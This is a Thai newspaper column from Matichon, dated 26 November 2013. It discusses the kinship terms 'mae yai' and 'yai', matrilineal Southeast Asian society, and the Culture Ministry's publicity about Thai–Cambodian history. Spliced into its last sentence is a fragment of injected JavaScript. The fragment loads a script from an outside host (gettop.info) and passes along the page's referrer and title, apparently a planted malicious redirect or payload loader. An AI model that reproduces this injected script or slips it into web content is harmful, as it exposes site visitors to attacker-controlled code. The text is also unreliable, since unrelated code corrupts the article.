Download PDF

 มติชนรายวัน ฉบับประจำวันอังคารที่ 26 พฤศจิกายน 2556

 

แม่ยาย, แม่ใหญ่

          แม่ของแม่ เรียก ยาย หรือ ใหญ่

          แม่ของเมีย เรียก แม่ยาย หรือ แม่ใหญ่ (แต่บางคนบอกว่าบางแห่งเรียก แม่นาย)

          ถ้าเทียบคำก็จะได้ดังนี้

          ยาย = นาย = ใหญ่ หรือคำว่า ยาย เป็นคำเดียวกับ นาย และ ใหญ่ หมายถึงผู้เป็นใหญ่ หรือหัวหน้า

          มีผู้บอกอีกว่าโดยทั่วไปแม่ใหญ่เป็นคำยกย่อง ใช้เรียกผู้เฒ่าผู้แก่ฝ่ายหญิงในชุมชนหมู่บ้าน หรือที่พบเห็นทั่วไปโดยไม่เคยรู้จักมาก่อนก็ได้ (มักใช้คู่กับพ่อใหญ่ เรียกฝ่ายชาย)

          ถ้าจริงอย่างนี้ก็สอดคล้องกับโครงสร้างสังคมสุวรรณภูมิและอุษาคเนย์ ยกย่องแม่หญิงเป็นใหญ่ในพิธีกรรมมาแต่ดึกดำบรรพ์ แล้วสืบสายตระกูลทางฝ่ายหญิง

          ผีผู้หญิงเป็นผีบรรพชน (ไม่เรียก ผีบรรพบุรุษ เพราะแปลว่า ผีผู้ชาย)

 

ประชาสัมพันธ์งาน วธ.

          หน่วยงานสังกัดกระทรวงวัฒนธรรม (วธ.) ประชุมร่วมกัน เพื่อแก้ปัญหาการเผยแพร่ประชาสัมพันธ์ข้อมูลข่าวสารของแต่ละหน่วยงานที่ยังเข้าไม่ถึงประชาชนอย่างแท้จริง

          งานประชาสัมพันธ์ของ วธ. แบ่งกว้างๆได้ 2 อย่าง คือ ประชาสัมพันธ์“สร้าง”ภาพลักษณ์หน่วยงานและผู้บริหาร (เช่น รมต., อธิบดี) กับแบ่งปันเผยแพร่ข้อมูลความรู้ทางวัฒนธรรม

          ประชาสัมพันธ์“สร้าง”ภาพลักษณ์ ไม่จำเป็นต้องเสียเวลาพูดถึง แต่แบ่งปันเผยแพร่ฯ มีแง่มุมให้ทักท้วงถกเถียงกันได้กว้างขวางมาก เพราะส่งประโยชน์สู่สังคมโดยรวม

          ความจำเป็นเร่งด่วนของ วธ. คือแบ่งปันเผยแพร่ข้อมูลความรู้เกี่ยวกับประวัติศาสตร์ไทยกับเพื่อนบ้านที่จะต้องอยู่ร่วมกันในประชาคมอาเซียน

          โดยเฉพาะประวัติศาสตร์ระหว่างไทยกับกัมพูชา ที่ต้องลงมือทันที (ความจริงควรทำนานแล้ว) เพื่อเตรียมใจคนในไทยที่จะต้องรับการเจรจาเรื่องพรมแดนด้านเขาพระวิหาร

          ทั้งนี้ เพราะประวัติศาสตร์แห่งชาติของไทย ที่ใช้งานมานานตั้งแต่ยุคล่าเมืองขึ้น ล้วนเป็นประวัติศาสตร์บาดหมางสร้างบาดแผลกับเพื่อนบ้านโดยรอบ

          ปัญหาจะอยู่ที่พื้นฐานความคิดทางประวัติศาสตร์ของข้าราชการในสังกัด วธ. ที่รับผิดชอบแบ่งปันเผยแพร่ฯเรื่องนี้ว่าโน้มไปทางไหน?

          ทางสงคราม หรือทางสันติภาพ?}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;